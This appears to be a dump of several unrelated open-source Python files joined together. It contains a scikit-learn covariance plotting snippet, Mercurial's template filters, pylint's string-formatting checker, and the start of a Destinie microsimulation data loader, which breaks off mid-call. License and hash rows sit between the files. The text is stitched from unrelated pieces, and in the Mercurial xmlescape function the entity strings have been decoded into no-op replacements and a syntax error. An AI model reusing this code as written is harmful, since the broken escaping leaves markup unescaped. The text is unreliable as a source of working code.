emp_mahal[:-n_outliers], '+k', markeredgewidth=1)
subfig2.plot(2.26 * np.ones(n_outliers),
emp_mahal[-n_outliers:], '+k', markeredgewidth=1)
subfig2.axes.set_xticklabels(('inliers', 'outliers'), size=15)
subfig2.set_ylabel(r"$\sqrt[3]{\rm{(Mahal. dist.)}}$", size=16)
subfig2.set_title("1. from non-robust estimates\n(Maximum Likelihood)")
plt.yticks(())
robust_mahal = robust_cov.mahalanobis(X - robust_cov.location_) ** (0.33)
subfig3 = plt.subplot(2, 2, 4)
subfig3.boxplot([robust_mahal[:-n_outliers], robust_mahal[-n_outliers:]],
widths=.25)
subfig3.plot(1.26 * np.ones(n_samples - n_outliers),
robust_mahal[:-n_outliers], '+k', markeredgewidth=1)
subfig3.plot(2.26 * np.ones(n_outliers),
robust_mahal[-n_outliers:], '+k', markeredgewidth=1)
subfig3.axes.set_xticklabels(('inliers', 'outliers'), size=15)
subfig3.set_ylabel(r"$\sqrt[3]{\rm{(Mahal. dist.)}}$", size=16)
subfig3.set_title("2. from robust estimates\n(Minimum Covariance Determinant)")
plt.yticks(())
plt.show()
| mit | 4,281,541,903,728,256,500 | 42.573427 | 79 | 0.679827 | false |
gorcz/mercurial | mercurial/templatefilters.py | 2 | 13028 | # template-filters.py - common template expansion filters
#
# Copyright 2005-2008 Matt Mackall <[email protected]>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import cgi, re, os, time, urllib
import encoding, node, util
import hbisect
import templatekw
def addbreaks(text):
""":addbreaks: Any text. Add an XHTML "<br />" tag before the end of
every line except the last.
"""
return text.replace('\n', '<br/>\n')
agescales = [("year", 3600 * 24 * 365, 'Y'),
("month", 3600 * 24 * 30, 'M'),
("week", 3600 * 24 * 7, 'W'),
("day", 3600 * 24, 'd'),
("hour", 3600, 'h'),
("minute", 60, 'm'),
("second", 1, 's')]
def age(date, abbrev=False):
""":age: Date. Returns a human-readable date/time difference between the
given date/time and the current date/time.
"""
def plural(t, c):
if c == 1:
return t
return t + "s"
def fmt(t, c, a):
if abbrev:
return "%d%s" % (c, a)
return "%d %s" % (c, plural(t, c))
now = time.time()
then = date[0]
future = False
if then > now:
future = True
delta = max(1, int(then - now))
if delta > agescales[0][1] * 30:
return 'in the distant future'
else:
delta = max(1, int(now - then))
if delta > agescales[0][1] * 2:
return util.shortdate(date)
for t, s, a in agescales:
n = delta // s
if n >= 2 or s == 1:
if future:
return '%s from now' % fmt(t, n, a)
return '%s ago' % fmt(t, n, a)
def basename(path):
""":basename: Any text. Treats the text as a path, and returns the last
component of the path after splitting by the path separator
(ignoring trailing separators). For example, "foo/bar/baz" becomes
"baz" and "foo/bar//" becomes "bar".
"""
return os.path.basename(path)
def count(i):
""":count: List or text. Returns the length as an integer."""
return len(i)
def datefilter(text):
""":date: Date. Returns a date in a Unix date format, including the
timezone: "Mon Sep 04 15:13:13 2006 0700".
"""
return util.datestr(text)
def domain(author):
""":domain: Any text. Finds the first string that looks like an email
address, and extracts just the domain component. Example: ``User
<[email protected]>`` becomes ``example.com``.
"""
f = author.find('@')
if f == -1:
return ''
author = author[f + 1:]
f = author.find('>')
if f >= 0:
author = author[:f]
return author
def email(text):
""":email: Any text. Extracts the first string that looks like an email
address. Example: ``User <[email protected]>`` becomes
``[email protected]``.
"""
return util.email(text)
def escape(text):
""":escape: Any text. Replaces the special XML/XHTML characters "&", "<"
and ">" with XML entities, and filters out NUL characters.
"""
return cgi.escape(text.replace('\0', ''), True)
para_re = None
space_re = None
def fill(text, width, initindent='', hangindent=''):
'''fill many paragraphs with optional indentation.'''
global para_re, space_re
if para_re is None:
para_re = re.compile('(\n\n|\n\\s*[-*]\\s*)', re.M)
space_re = re.compile(r' +')
def findparas():
start = 0
while True:
m = para_re.search(text, start)
if not m:
uctext = unicode(text[start:], encoding.encoding)
w = len(uctext)
while 0 < w and uctext[w - 1].isspace():
w -= 1
yield (uctext[:w].encode(encoding.encoding),
uctext[w:].encode(encoding.encoding))
break
yield text[start:m.start(0)], m.group(1)
start = m.end(1)
return "".join([util.wrap(space_re.sub(' ', util.wrap(para, width)),
width, initindent, hangindent) + rest
for para, rest in findparas()])
def fill68(text):
""":fill68: Any text. Wraps the text to fit in 68 columns."""
return fill(text, 68)
def fill76(text):
""":fill76: Any text. Wraps the text to fit in 76 columns."""
return fill(text, 76)
def firstline(text):
""":firstline: Any text. Returns the first line of text."""
try:
return text.splitlines(True)[0].rstrip('\r\n')
except IndexError:
return ''
def hexfilter(text):
""":hex: Any text. Convert a binary Mercurial node identifier into
its long hexadecimal representation.
"""
return node.hex(text)
def hgdate(text):
""":hgdate: Date. Returns the date as a pair of numbers: "1157407993
25200" (Unix timestamp, timezone offset).
"""
return "%d %d" % text
def isodate(text):
""":isodate: Date. Returns the date in ISO 8601 format: "2009-08-18 13:00
+0200".
"""
return util.datestr(text, '%Y-%m-%d %H:%M %1%2')
def isodatesec(text):
""":isodatesec: Date. Returns the date in ISO 8601 format, including
seconds: "2009-08-18 13:00:13 +0200". See also the rfc3339date
filter.
"""
return util.datestr(text, '%Y-%m-%d %H:%M:%S %1%2')
def indent(text, prefix):
'''indent each non-empty line of text after first with prefix.'''
lines = text.splitlines()
num_lines = len(lines)
endswithnewline = text[-1:] == '\n'
def indenter():
for i in xrange(num_lines):
l = lines[i]
if i and l.strip():
yield prefix
yield l
if i < num_lines - 1 or endswithnewline:
yield '\n'
return "".join(indenter())
def json(obj):
if obj is None or obj is False or obj is True:
return {None: 'null', False: 'false', True: 'true'}[obj]
elif isinstance(obj, int) or isinstance(obj, float):
return str(obj)
elif isinstance(obj, str):
u = unicode(obj, encoding.encoding, 'replace')
return '"%s"' % jsonescape(u)
elif isinstance(obj, unicode):
return '"%s"' % jsonescape(obj)
elif util.safehasattr(obj, 'keys'):
out = []
for k, v in sorted(obj.iteritems()):
s = '%s: %s' % (json(k), json(v))
out.append(s)
return '{' + ', '.join(out) + '}'
elif util.safehasattr(obj, '__iter__'):
out = []
for i in obj:
out.append(json(i))
return '[' + ', '.join(out) + ']'
elif util.safehasattr(obj, '__call__'):
return json(obj())
else:
raise TypeError('cannot encode type %s' % obj.__class__.__name__)
def _uescape(c):
if ord(c) < 0x80:
return c
else:
return '\\u%04x' % ord(c)
_escapes = [
('\\', '\\\\'), ('"', '\\"'), ('\t', '\\t'), ('\n', '\\n'),
('\r', '\\r'), ('\f', '\\f'), ('\b', '\\b'),
('<', '\\u003c'), ('>', '\\u003e'), ('\0', '\\u0000')
]
def jsonescape(s):
for k, v in _escapes:
s = s.replace(k, v)
return ''.join(_uescape(c) for c in s)
def localdate(text):
""":localdate: Date. Converts a date to local date."""
return (util.parsedate(text)[0], util.makedate()[1])
def lower(text):
""":lower: Any text. Converts the text to lowercase."""
return encoding.lower(text)
def nonempty(str):
""":nonempty: Any text. Returns '(none)' if the string is empty."""
return str or "(none)"
def obfuscate(text):
""":obfuscate: Any text. Returns the input text rendered as a sequence of
XML entities.
"""
text = unicode(text, encoding.encoding, 'replace')
return ''.join(['&#%d;' % ord(c) for c in text])
def permissions(flags):
if "l" in flags:
return "lrwxrwxrwx"
if "x" in flags:
return "-rwxr-xr-x"
return "-rw-r--r--"
def person(author):
""":person: Any text. Returns the name before an email address,
interpreting it as per RFC 5322.
>>> person('foo@bar')
'foo'
>>> person('Foo Bar <foo@bar>')
'Foo Bar'
>>> person('"Foo Bar" <foo@bar>')
'Foo Bar'
>>> person('"Foo \"buz\" Bar" <foo@bar>')
'Foo "buz" Bar'
>>> # The following are invalid, but do exist in real-life
...
>>> person('Foo "buz" Bar <foo@bar>')
'Foo "buz" Bar'
>>> person('"Foo Bar <foo@bar>')
'Foo Bar'
"""
if '@' not in author:
return author
f = author.find('<')
if f != -1:
return author[:f].strip(' "').replace('\\"', '"')
f = author.find('@')
return author[:f].replace('.', ' ')
def rfc3339date(text):
""":rfc3339date: Date. Returns a date using the Internet date format
specified in RFC 3339: "2009-08-18T13:00:13+02:00".
"""
return util.datestr(text, "%Y-%m-%dT%H:%M:%S%1:%2")
def rfc822date(text):
""":rfc822date: Date. Returns a date using the same format used in email
headers: "Tue, 18 Aug 2009 13:00:13 +0200".
"""
return util.datestr(text, "%a, %d %b %Y %H:%M:%S %1%2")
def short(text):
""":short: Changeset hash. Returns the short form of a changeset hash,
i.e. a 12 hexadecimal digit string.
"""
return text[:12]
def shortbisect(text):
""":shortbisect: Any text. Treats `text` as a bisection status, and
returns a single-character representing the status (G: good, B: bad,
S: skipped, U: untested, I: ignored). Returns single space if `text`
is not a valid bisection status.
"""
return hbisect.shortlabel(text) or ' '
def shortdate(text):
""":shortdate: Date. Returns a date like "2006-09-18"."""
return util.shortdate(text)
def splitlines(text):
""":splitlines: Any text. Split text into a list of lines."""
return templatekw.showlist('line', text.splitlines(), 'lines')
def stringescape(text):
return text.encode('string_escape')
def stringify(thing):
""":stringify: Any type. Turns the value into text by converting values into
text and concatenating them.
"""
if util.safehasattr(thing, '__iter__') and not isinstance(thing, str):
return "".join([stringify(t) for t in thing if t is not None])
return str(thing)
def strip(text):
""":strip: Any text. Strips all leading and trailing whitespace."""
return text.strip()
def stripdir(text):
""":stripdir: Treat the text as path and strip a directory level, if
possible. For example, "foo" and "foo/bar" becomes "foo".
"""
dir = os.path.dirname(text)
if dir == "":
return os.path.basename(text)
else:
return dir
def tabindent(text):
""":tabindent: Any text. Returns the text, with every non-empty line
except the first starting with a tab character.
"""
return indent(text, '\t')
def upper(text):
""":upper: Any text. Converts the text to uppercase."""
return encoding.upper(text)
def urlescape(text):
""":urlescape: Any text. Escapes all "special" characters. For example,
"foo bar" becomes "foo%20bar".
"""
return urllib.quote(text)
def userfilter(text):
""":user: Any text. Returns a short representation of a user name or email
address."""
return util.shortuser(text)
def emailuser(text):
""":emailuser: Any text. Returns the user portion of an email address."""
return util.emailuser(text)
def xmlescape(text):
text = (text
.replace('&', '&')
.replace('<', '<')
.replace('>', '>')
.replace('"', '"')
.replace("'", ''')) # ' invalid in HTML
return re.sub('[\x00-\x08\x0B\x0C\x0E-\x1F]', ' ', text)
filters = {
"addbreaks": addbreaks,
"age": age,
"basename": basename,
"count": count,
"date": datefilter,
"domain": domain,
"email": email,
"escape": escape,
"fill68": fill68,
"fill76": fill76,
"firstline": firstline,
"hex": hexfilter,
"hgdate": hgdate,
"isodate": isodate,
"isodatesec": isodatesec,
"json": json,
"jsonescape": jsonescape,
"localdate": localdate,
"lower": lower,
"nonempty": nonempty,
"obfuscate": obfuscate,
"permissions": permissions,
"person": person,
"rfc3339date": rfc3339date,
"rfc822date": rfc822date,
"short": short,
"shortbisect": shortbisect,
"shortdate": shortdate,
"splitlines": splitlines,
"stringescape": stringescape,
"stringify": stringify,
"strip": strip,
"stripdir": stripdir,
"tabindent": tabindent,
"upper": upper,
"urlescape": urlescape,
"user": userfilter,
"emailuser": emailuser,
"xmlescape": xmlescape,
}
def websub(text, websubtable):
""":websub: Any text. Only applies to hgweb. Applies the regular
expression replacements defined in the websub section.
"""
if websubtable:
for regexp, format in websubtable:
text = regexp.sub(format, text)
return text
# tell hggettext to extract docstrings from these functions:
i18nfunctions = filters.values()
| gpl-2.0 | 1,865,124,696,221,018,000 | 29.227378 | 80 | 0.575683 | false |
GbalsaC/bitnamiP | venv/lib/python2.7/site-packages/pylint/checkers/strings.py | 8 | 26724 | # Copyright (c) 2009-2010 Arista Networks, Inc. - James Lingard
# Copyright (c) 2004-2013 LOGILAB S.A. (Paris, FRANCE).
# Copyright 2012 Google Inc.
#
# http://www.logilab.fr/ -- mailto:[email protected]
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""Checker for string formatting operations.
"""
import sys
import tokenize
import string
import numbers
import astroid
from pylint.interfaces import ITokenChecker, IAstroidChecker, IRawChecker
from pylint.checkers import BaseChecker, BaseTokenChecker
from pylint.checkers import utils
from pylint.checkers.utils import check_messages
import six
_PY3K = sys.version_info[:2] >= (3, 0)
_PY27 = sys.version_info[:2] == (2, 7)
MSGS = {
'E1300': ("Unsupported format character %r (%#02x) at index %d",
"bad-format-character",
"Used when a unsupported format character is used in a format\
string."),
'E1301': ("Format string ends in middle of conversion specifier",
"truncated-format-string",
"Used when a format string terminates before the end of a \
conversion specifier."),
'E1302': ("Mixing named and unnamed conversion specifiers in format string",
"mixed-format-string",
"Used when a format string contains both named (e.g. '%(foo)d') \
and unnamed (e.g. '%d') conversion specifiers. This is also \
used when a named conversion specifier contains * for the \
minimum field width and/or precision."),
'E1303': ("Expected mapping for format string, not %s",
"format-needs-mapping",
"Used when a format string that uses named conversion specifiers \
is used with an argument that is not a mapping."),
'W1300': ("Format string dictionary key should be a string, not %s",
"bad-format-string-key",
"Used when a format string that uses named conversion specifiers \
is used with a dictionary whose keys are not all strings."),
'W1301': ("Unused key %r in format string dictionary",
"unused-format-string-key",
"Used when a format string that uses named conversion specifiers \
is used with a dictionary that conWtains keys not required by the \
format string."),
'E1304': ("Missing key %r in format string dictionary",
"missing-format-string-key",
"Used when a format string that uses named conversion specifiers \
is used with a dictionary that doesn't contain all the keys \
required by the format string."),
'E1305': ("Too many arguments for format string",
"too-many-format-args",
"Used when a format string that uses unnamed conversion \
specifiers is given too many arguments."),
'E1306': ("Not enough arguments for format string",
"too-few-format-args",
"Used when a format string that uses unnamed conversion \
specifiers is given too few arguments"),
'W1302': ("Invalid format string",
"bad-format-string",
"Used when a PEP 3101 format string is invalid.",
{'minversion': (2, 7)}),
'W1303': ("Missing keyword argument %r for format string",
"missing-format-argument-key",
"Used when a PEP 3101 format string that uses named fields "
"doesn't receive one or more required keywords.",
{'minversion': (2, 7)}),
'W1304': ("Unused format argument %r",
"unused-format-string-argument",
"Used when a PEP 3101 format string that uses named "
"fields is used with an argument that "
"is not required by the format string.",
{'minversion': (2, 7)}),
'W1305': ("Format string contains both automatic field numbering "
"and manual field specification",
"format-combined-specification",
"Usen when a PEP 3101 format string contains both automatic "
"field numbering (e.g. '{}') and manual field "
"specification (e.g. '{0}').",
{'minversion': (2, 7)}),
'W1306': ("Missing format attribute %r in format specifier %r",
"missing-format-attribute",
"Used when a PEP 3101 format string uses an "
"attribute specifier ({0.length}), but the argument "
"passed for formatting doesn't have that attribute.",
{'minversion': (2, 7)}),
'W1307': ("Using invalid lookup key %r in format specifier %r",
"invalid-format-index",
"Used when a PEP 3101 format string uses a lookup specifier "
"({a[1]}), but the argument passed for formatting "
"doesn't contain or doesn't have that key as an attribute.",
{'minversion': (2, 7)})
}
OTHER_NODES = (astroid.Const, astroid.List, astroid.Backquote,
astroid.Lambda, astroid.Function,
astroid.ListComp, astroid.SetComp, astroid.GenExpr)
if _PY3K:
import _string
def split_format_field_names(format_string):
return _string.formatter_field_name_split(format_string)
else:
def _field_iterator_convertor(iterator):
for is_attr, key in iterator:
if isinstance(key, numbers.Number):
yield is_attr, int(key)
else:
yield is_attr, key
def split_format_field_names(format_string):
keyname, fielditerator = format_string._formatter_field_name_split()
# it will return longs, instead of ints, which will complicate
# the output
return keyname, _field_iterator_convertor(fielditerator)
def collect_string_fields(format_string):
""" Given a format string, return an iterator
of all the valid format fields. It handles nested fields
as well.
"""
formatter = string.Formatter()
try:
parseiterator = formatter.parse(format_string)
for result in parseiterator:
if all(item is None for item in result[1:]):
# not a replacement format
continue
name = result[1]
nested = result[2]
yield name
if nested:
for field in collect_string_fields(nested):
yield field
except ValueError:
# probably the format string is invalid
# should we check the argument of the ValueError?
raise utils.IncompleteFormatString(format_string)
def parse_format_method_string(format_string):
"""
Parses a PEP 3101 format string, returning a tuple of
(keys, num_args, manual_pos_arg),
where keys is the set of mapping keys in the format string, num_args
is the number of arguments required by the format string and
manual_pos_arg is the number of arguments passed with the position.
"""
keys = []
num_args = 0
manual_pos_arg = set()
for name in collect_string_fields(format_string):
if name and str(name).isdigit():
manual_pos_arg.add(str(name))
elif name:
keyname, fielditerator = split_format_field_names(name)
if isinstance(keyname, numbers.Number):
# In Python 2 it will return long which will lead
# to different output between 2 and 3
manual_pos_arg.add(str(keyname))
keyname = int(keyname)
keys.append((keyname, list(fielditerator)))
else:
num_args += 1
return keys, num_args, len(manual_pos_arg)
def get_args(callfunc):
""" Get the arguments from the given `CallFunc` node.
Return a tuple, where the first element is the
number of positional arguments and the second element
is the keyword arguments in a dict.
"""
positional = 0
named = {}
for arg in callfunc.args:
if isinstance(arg, astroid.Keyword):
named[arg.arg] = utils.safe_infer(arg.value)
else:
positional += 1
return positional, named
def get_access_path(key, parts):
""" Given a list of format specifiers, returns
the final access path (e.g. a.b.c[0][1]).
"""
path = []
for is_attribute, specifier in parts:
if is_attribute:
path.append(".{}".format(specifier))
else:
path.append("[{!r}]".format(specifier))
return str(key) + "".join(path)
class StringFormatChecker(BaseChecker):
"""Checks string formatting operations to ensure that the format string
is valid and the arguments match the format string.
"""
__implements__ = (IAstroidChecker,)
name = 'string'
msgs = MSGS
@check_messages(*(MSGS.keys()))
def visit_binop(self, node):
if node.op != '%':
return
left = node.left
args = node.right
if not (isinstance(left, astroid.Const)
and isinstance(left.value, six.string_types)):
return
format_string = left.value
try:
required_keys, required_num_args = \
utils.parse_format_string(format_string)
except utils.UnsupportedFormatCharacter as e:
c = format_string[e.index]
self.add_message('bad-format-character',
node=node, args=(c, ord(c), e.index))
return
except utils.IncompleteFormatString:
self.add_message('truncated-format-string', node=node)
return
if required_keys and required_num_args:
# The format string uses both named and unnamed format
# specifiers.
self.add_message('mixed-format-string', node=node)
elif required_keys:
# The format string uses only named format specifiers.
# Check that the RHS of the % operator is a mapping object
# that contains precisely the set of keys required by the
# format string.
if isinstance(args, astroid.Dict):
keys = set()
unknown_keys = False
for k, _ in args.items:
if isinstance(k, astroid.Const):
key = k.value
if isinstance(key, six.string_types):
keys.add(key)
else:
self.add_message('bad-format-string-key',
node=node, args=key)
else:
# One of the keys was something other than a
# constant. Since we can't tell what it is,
# supress checks for missing keys in the
# dictionary.
unknown_keys = True
if not unknown_keys:
for key in required_keys:
if key not in keys:
self.add_message('missing-format-string-key',
node=node, args=key)
for key in keys:
if key not in required_keys:
self.add_message('unused-format-string-key',
node=node, args=key)
elif isinstance(args, OTHER_NODES + (astroid.Tuple,)):
type_name = type(args).__name__
self.add_message('format-needs-mapping',
node=node, args=type_name)
# else:
# The RHS of the format specifier is a name or
# expression. It may be a mapping object, so
# there's nothing we can check.
else:
# The format string uses only unnamed format specifiers.
# Check that the number of arguments passed to the RHS of
# the % operator matches the number required by the format
# string.
if isinstance(args, astroid.Tuple):
num_args = len(args.elts)
elif isinstance(args, OTHER_NODES + (astroid.Dict, astroid.DictComp)):
num_args = 1
else:
# The RHS of the format specifier is a name or
# expression. It could be a tuple of unknown size, so
# there's nothing we can check.
num_args = None
if num_args is not None:
if num_args > required_num_args:
self.add_message('too-many-format-args', node=node)
elif num_args < required_num_args:
self.add_message('too-few-format-args', node=node)
class StringMethodsChecker(BaseChecker):
__implements__ = (IAstroidChecker,)
name = 'string'
msgs = {
'E1310': ("Suspicious argument in %s.%s call",
"bad-str-strip-call",
"The argument to a str.{l,r,}strip call contains a"
" duplicate character, "),
}
@check_messages(*(MSGS.keys()))
def visit_callfunc(self, node):
func = utils.safe_infer(node.func)
if (isinstance(func, astroid.BoundMethod)
and isinstance(func.bound, astroid.Instance)
and func.bound.name in ('str', 'unicode', 'bytes')):
if func.name in ('strip', 'lstrip', 'rstrip') and node.args:
arg = utils.safe_infer(node.args[0])
if not isinstance(arg, astroid.Const):
return
if len(arg.value) != len(set(arg.value)):
self.add_message('bad-str-strip-call', node=node,
args=(func.bound.name, func.name))
elif func.name == 'format':
if _PY27 or _PY3K:
self._check_new_format(node, func)
def _check_new_format(self, node, func):
""" Check the new string formatting. """
# TODO: skip (for now) format nodes which don't have
# an explicit string on the left side of the format operation.
# We do this because our inference engine can't properly handle
# redefinitions of the original string.
# For more details, see issue 287.
#
# Note that there may not be any left side at all, if the format method
# has been assigned to another variable. See issue 351. For example:
#
# fmt = 'some string {}'.format
# fmt('arg')
if (isinstance(node.func, astroid.Getattr)
and not isinstance(node.func.expr, astroid.Const)):
return
try:
strnode = next(func.bound.infer())
except astroid.InferenceError:
return
if not isinstance(strnode, astroid.Const):
return
if node.starargs or node.kwargs:
# TODO: Don't complicate the logic, skip these for now.
return
try:
positional, named = get_args(node)
except astroid.InferenceError:
return
try:
fields, num_args, manual_pos = parse_format_method_string(strnode.value)
except utils.IncompleteFormatString:
self.add_message('bad-format-string', node=node)
return
named_fields = set(field[0] for field in fields
if isinstance(field[0], six.string_types))
if num_args and manual_pos:
self.add_message('format-combined-specification',
node=node)
return
check_args = False
# Consider "{[0]} {[1]}" as num_args.
num_args += sum(1 for field in named_fields
if field == '')
if named_fields:
for field in named_fields:
if field not in named and field:
self.add_message('missing-format-argument-key',
node=node,
args=(field, ))
for field in named:
if field not in named_fields:
self.add_message('unused-format-string-argument',
node=node,
args=(field, ))
# num_args can be 0 if manual_pos is not.
num_args = num_args or manual_pos
if positional or num_args:
empty = any(True for field in named_fields
if field == '')
if named or empty:
# Verify the required number of positional arguments
# only if the .format got at least one keyword argument.
# This means that the format strings accepts both
# positional and named fields and we should warn
# when one of the them is missing or is extra.
check_args = True
else:
check_args = True
if check_args:
# num_args can be 0 if manual_pos is not.
num_args = num_args or manual_pos
if positional > num_args:
self.add_message('too-many-format-args', node=node)
elif positional < num_args:
self.add_message('too-few-format-args', node=node)
self._check_new_format_specifiers(node, fields, named)
def _check_new_format_specifiers(self, node, fields, named):
"""
Check attribute and index access in the format
string ("{0.a}" and "{0[a]}").
"""
for key, specifiers in fields:
# Obtain the argument. If it can't be obtained
# or infered, skip this check.
if key == '':
# {[0]} will have an unnamed argument, defaulting
# to 0. It will not be present in `named`, so use the value
# 0 for it.
key = 0
if isinstance(key, numbers.Number):
try:
argname = utils.get_argument_from_call(node, key)
except utils.NoSuchArgumentError:
continue
else:
if key not in named:
continue
argname = named[key]
if argname in (astroid.YES, None):
continue
try:
argument = next(argname.infer())
except astroid.InferenceError:
continue
if not specifiers or argument is astroid.YES:
# No need to check this key if it doesn't
# use attribute / item access
continue
if argument.parent and isinstance(argument.parent, astroid.Arguments):
# Ignore any object coming from an argument,
# because we can't infer its value properly.
continue
previous = argument
parsed = []
for is_attribute, specifier in specifiers:
if previous is astroid.YES:
break
parsed.append((is_attribute, specifier))
if is_attribute:
try:
previous = previous.getattr(specifier)[0]
except astroid.NotFoundError:
if (hasattr(previous, 'has_dynamic_getattr') and
previous.has_dynamic_getattr()):
# Don't warn if the object has a custom __getattr__
break
path = get_access_path(key, parsed)
self.add_message('missing-format-attribute',
args=(specifier, path),
node=node)
break
else:
warn_error = False
if hasattr(previous, 'getitem'):
try:
previous = previous.getitem(specifier)
except (IndexError, TypeError):
warn_error = True
else:
try:
# Lookup __getitem__ in the current node,
# but skip further checks, because we can't
# retrieve the looked object
previous.getattr('__getitem__')
break
except astroid.NotFoundError:
warn_error = True
if warn_error:
path = get_access_path(key, parsed)
self.add_message('invalid-format-index',
args=(specifier, path),
node=node)
break
try:
previous = next(previous.infer())
except astroid.InferenceError:
# can't check further if we can't infer it
break
class StringConstantChecker(BaseTokenChecker):
"""Check string literals"""
__implements__ = (ITokenChecker, IRawChecker)
name = 'string_constant'
msgs = {
'W1401': ('Anomalous backslash in string: \'%s\'. '
'String constant might be missing an r prefix.',
'anomalous-backslash-in-string',
'Used when a backslash is in a literal string but not as an '
'escape.'),
'W1402': ('Anomalous Unicode escape in byte string: \'%s\'. '
'String constant might be missing an r or u prefix.',
'anomalous-unicode-escape-in-string',
'Used when an escape like \\u is encountered in a byte '
'string where it has no effect.'),
}
# Characters that have a special meaning after a backslash in either
# Unicode or byte strings.
ESCAPE_CHARACTERS = 'abfnrtvx\n\r\t\\\'\"01234567'
# TODO(mbp): Octal characters are quite an edge case today; people may
# prefer a separate warning where they occur. \0 should be allowed.
# Characters that have a special meaning after a backslash but only in
# Unicode strings.
UNICODE_ESCAPE_CHARACTERS = 'uUN'
def process_module(self, module):
self._unicode_literals = 'unicode_literals' in module.future_imports
def process_tokens(self, tokens):
for (tok_type, token, (start_row, _), _, _) in tokens:
if tok_type == tokenize.STRING:
# 'token' is the whole un-parsed token; we can look at the start
# of it to see whether it's a raw or unicode string etc.
self.process_string_token(token, start_row)
def process_string_token(self, token, start_row):
for i, c in enumerate(token):
if c in '\'\"':
quote_char = c
break
# pylint: disable=undefined-loop-variable
prefix = token[:i].lower() # markers like u, b, r.
after_prefix = token[i:]
if after_prefix[:3] == after_prefix[-3:] == 3 * quote_char:
string_body = after_prefix[3:-3]
else:
string_body = after_prefix[1:-1] # Chop off quotes
# No special checks on raw strings at the moment.
if 'r' not in prefix:
self.process_non_raw_string_token(prefix, string_body, start_row)
def process_non_raw_string_token(self, prefix, string_body, start_row):
"""check for bad escapes in a non-raw string.
prefix: lowercase string of eg 'ur' string prefix markers.
string_body: the un-parsed body of the string, not including the quote
marks.
start_row: integer line number in the source.
"""
# Walk through the string; if we see a backslash then escape the next
# character, and skip over it. If we see a non-escaped character,
# alert, and continue.
#
# Accept a backslash when it escapes a backslash, or a quote, or
# end-of-line, or one of the letters that introduce a special escape
# sequence <http://docs.python.org/reference/lexical_analysis.html>
#
# TODO(mbp): Maybe give a separate warning about the rarely-used
# \a \b \v \f?
#
# TODO(mbp): We could give the column of the problem character, but
# add_message doesn't seem to have a way to pass it through at present.
i = 0
while True:
i = string_body.find('\\', i)
if i == -1:
break
# There must be a next character; having a backslash at the end
# of the string would be a SyntaxError.
next_char = string_body[i+1]
match = string_body[i:i+2]
if next_char in self.UNICODE_ESCAPE_CHARACTERS:
if 'u' in prefix:
pass
elif (_PY3K or self._unicode_literals) and 'b' not in prefix:
pass # unicode by default
else:
self.add_message('anomalous-unicode-escape-in-string',
line=start_row, args=(match, ))
elif next_char not in self.ESCAPE_CHARACTERS:
self.add_message('anomalous-backslash-in-string',
line=start_row, args=(match, ))
# Whether it was a valid escape or not, backslash followed by
# another character can always be consumed whole: the second
# character can never be the start of a new backslash escape.
i += 2
def register(linter):
"""required method to auto register this checker """
linter.register_checker(StringFormatChecker(linter))
linter.register_checker(StringMethodsChecker(linter))
linter.register_checker(StringConstantChecker(linter))
| agpl-3.0 | -5,079,807,530,429,138,000 | 42.453659 | 84 | 0.549805 | false |
TaxIPP-Life/til-france | til_france/data/data/Destinie.py | 1 | 28133 | # -*- coding:utf-8 -*-
'''
Created on 11 septembre 2013
Ce programme :
Input :
Output :
'''
import logging
from pandas import merge, DataFrame, concat, read_table
import numpy as np
import os
import pdb
import time
import sys
# 1- Importation des classes/librairies/tables nécessaires à l'importation des données de Destinie
# -> Recup des infos dans Patrimoine
from til.data.DataTil import DataTil
from til.data.utils.utils import minimal_dtype, drop_consecutive_row
from til.CONFIG import path_data_destinie
log = logging.getLogger(__name__)
class Destinie(DataTil):
def __init__(self):
DataTil.__init__(self)
self.name = 'Destinie'
self.survey_year = 2009
self.last_year = 2060
self.survey_date = 100 * self.survey_year + 1
# TODO: Faire une fonction qui check où on en est, si les précédent on bien été fait, etc.
# TODO: Dans la même veine, on devrait définir la suppression des variables en fonction des étapes à venir.
self.methods_order = [
'load', 'format_initial', 'enf_to_par', 'check_partneroint', 'creation_menage', 'creation_foy',
'var_sup', 'add_futur', 'store_to_liam'
]
def load(self):
def _BioEmp_in_2():
''' Division de BioEmpen trois tables '''
longueur_carriere = 106 # self.max_dur
start_time = time.time()
# TODO: revoir le colnames de BioEmp : le retirer ?
colnames = list(range(longueur_carriere))
path = os.path.join(path_data_destinie, 'BioEmp.txt')
assert os.path.exists(path), 'Error for BioEmp.txt path. File cannot be found in {}'.format(path)
BioEmp = read_table(path, sep=';', header=None, names=colnames)
taille = len(BioEmp) / 3
BioEmp['id'] = BioEmp.index / 3
# selection0 : informations atemporelles sur les individus (identifiant, sexe, date de naissance et
# âge de fin d'étude)
selection0 = [3 * x for x in range(taille)]
ind = BioEmp.iloc[selection0].copy()
ind.reset_index(inplace=True)
ind.rename(columns = {1: 'sexe', 2: 'naiss', 3: 'findet', 4: 'tx_prime_fct'}, inplace=True)
for column in ind.columns:
if column in ['sexe', 'naiss', 'findet']:
ind[column] = ind[column].astype(int)
elif column in ['tx_prime_fct']:
continue
else:
del ind[column]
ind['id'] = ind.index
# selection1 : information sur les statuts d'emploi
selection1 = [3 * x + 1 for x in range(taille)]
statut = BioEmp.iloc[selection1].copy()
statut = np.array(statut.set_index('id').stack().reset_index())
# statut = statut.rename(columns={'level_1':'period', 0:'workstate'})
# statut = statut[['id', 'period', 'workstate']] #.fillna(np.nan)
# statut = minimal_dtype(statut)
# selection2 : informations sur les salaires
selection2 = [3 * x + 2 for x in range(taille)]
sal = BioEmp.iloc[selection2].copy()
sal = sal.set_index('id').stack().reset_index()
sal = sal[0]
# .fillna(np.nan)
# sal = minimal_dtype(sal)
# Merge de selection 1 et 2 :
emp = np.zeros((len(sal), 4))
emp[:, 0:3] = statut
emp[:, 3] = sal
emp = DataFrame(emp, columns=['id', 'period', 'workstate', 'salaire_imposable'])
# Mise au format minimal
emp = emp.fillna(np.nan).replace(-1, np.nan)
emp = minimal_dtype(emp)
return ind, emp
def _lecture_BioFam():
path = os.path.join(path_data_destinie, 'BioFam.txt')
BioFam = read_table(
path,
sep = ';',
header = None,
